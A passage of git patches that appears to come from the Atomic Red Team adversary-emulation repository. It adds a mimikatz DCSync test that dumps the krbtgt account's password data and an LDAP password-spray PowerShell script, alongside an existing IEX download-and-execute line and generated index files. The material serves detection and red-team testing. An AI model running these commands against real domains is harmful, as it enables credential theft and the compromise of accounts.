D":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e4cf0833..af49d7f5 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -197,6 +197,7 @@ credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt +credential-access,T1003.006,DCSync,1,DCSync,129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell credential-access,T1558.001,Golden Ticket,1,Crafting golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 98ae9b4c..582bd47a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -7,6 +7,7 @@ credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt +credential-access,T1003.006,DCSync,1,DCSync,129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell credential-access,T1558.001,Golden Ticket,1,Crafting golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f97fbfa7..6088e791 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -405,7 +405,8 @@ - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) - Atomic Test #1: Enumeration for Credentials in Registry [windows] - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] -- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.006 DCSync](../../T1003.006/T1003.006.md) + - Atomic Test #1: DCSync [windows] - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 78395c09..50254e24 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -18,7 +18,8 @@ - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) - Atomic Test #1: Enumeration for Credentials in Registry [windows] - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] -- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.006 DCSync](../../T1003.006/T1003.006.md) + - Atomic Test #1: DCSync [windows] - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 9bed094c..e0e95bab 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -14,7 +14,7 @@ | [Local Accounts](../../T1078.003/T1078.003.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | [Local Account](../../T1087.001/T1087.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index e5f5dcea..7eec7b6f 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -11,7 +11,7 @@ | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fd4ef41a..f16741cb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -18994,7 +18994,50 @@ credential-access: x_mitre_is_subtechnique: true x_mitre_platforms: - Windows - atomic_tests: [] + identifier: T1003.006 + atomic_tests: + - name: DCSync + auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e + description: | + Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. + Works against a remote Windows Domain Controller using the replication protocol. + Privileges required: domain admin or domain controller account (by default), or any other account with required rights. + [Reference](https://adsecurity.org/?p=1729) + supported_platforms: + - windows + input_arguments: + domain: + description: Targeted domain + type: string + default: example.com + user: + description: Targeted user + type: string + default: krbtgt + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "%tmp%\\mimikatz\\x64\\mimikatz.exe" + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + executor: + name: command_prompt + elevation_required: false + command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" + "exit"' T1556.001: technique: external_references: diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md new file mode 100644 index 00000000..f86b639b --- /dev/null +++ b/atomics/T1003.006/T1003.006.md @@ -0,0 +1,64 @@ +# T1003.006 - DCSync +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006) +
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync. + +Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017) + +DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
+ +## Atomic Tests + +- [Atomic Test #1 - DCSync](#atomic-test-1---dcsync) + + +
+ +## Atomic Test #1 - DCSync +Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. +Works against a remote Windows Domain Controller using the replication protocol. +Privileges required: domain admin or domain controller account (by default), or any other account with required rights. +[Reference](https://adsecurity.org/?p=1729) + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | Targeted domain | string | example.com| +| user | Targeted user | string | krbtgt| +| mimikatz_path | Mimikatz windows executable | path | %tmp%\mimikatz\x64\mimikatz.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) +##### Check Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force +New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null +Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force +``` + + + + +
From c71444f1dcd6555a8213544991d30a9a1ea9fd21 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 6 Jan 2021 19:51:31 +0100 Subject: [PATCH 049/131] T1110.003: add test "Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)" (#1349) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Zakaria Addi Co-authored-by: Clément Notin Co-authored-by: Zakaria Addi --- atomics/T1110.003/T1110.003.yaml | 59 +++++++++++++++++++++++++++++--- 1 file changed, 55 insertions(+), 4 deletions(-) diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 5a97f94c..7c8c81c7 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -3,10 +3,10 @@ display_name: 'Brute Force: Password Spraying' atomic_tests: - name: Password Spray all Domain Users auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175 - description: + description: CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. - This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. + This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. @@ -37,7 +37,7 @@ atomic_tests: auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain - + https://github.com/dafthack/DomainPasswordSpray supported_platforms: @@ -48,9 +48,60 @@ atomic_tests: description: Domain to brute force against type: String default: (Get-ADDomain | Select-Object -ExpandProperty Name) - + executor: name: powershell elevation_required: false command: | IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force +- name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) + auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d + description: | + Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos + + Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) + supported_platforms: + - windows + input_arguments: + password: + description: single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) + type: String + default: P@ssw0rd! + domain: + description: Domain FQDN + type: String + default: contoso.com + auth: + description: authentication method to choose between "NTLM" and "Kerberos" + type: string + default: NTLM + executor: + name: powershell + elevation_required: false + command: | + if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) { + Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" + exit 1 + } + + $DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName + + [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null + $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389) + + $DomainUsers | Foreach-Object { + $user = $_ + $password = "#{password}" + + $credz = new-object System.Net.NetworkCredential($user, $password, "#{domain}") + $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth}) + try { + Write-Host " [-] Attempting ${password} on account ${user}." + $conn.bind() + # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success + Write-Host " [!] ${user}:${password} are valid credentials!" + } catch { + Write-Host $_.Exception.Message + } + } + Write-Host "End of password spraying" From a4ca274d7df0b90fbaec4db3bfc146bba813c0be Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 6 Jan 2021 18:51:49 +0000 Subject: [PATCH 050/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e3b2d66c..2214471a 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -646,3 +646,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 9726592a-dabc-4d4d-81cd-44070008b3af 3203ad24-168e-4bec-be36-f79b13ef8a83 129efd28-8497-4c87-a1b0-73b9a870ca3e +f14d956a-5b6e-4a93-847f-0c415142f07d From 4dbcb20934e3d68cb69492c08d593cfc453ae884 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 6 Jan 2021 18:51:58 +0000 Subject: [PATCH 051/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 53 ++++++++++++++++ atomics/T1110.003/T1110.003.md | 60 +++++++++++++++++++ 6 files changed, 117 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index af49d7f5..5601a19a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -232,6 +232,7 @@ credential-access,T1556.002,Password Filter DLL,1,Install and Register Password 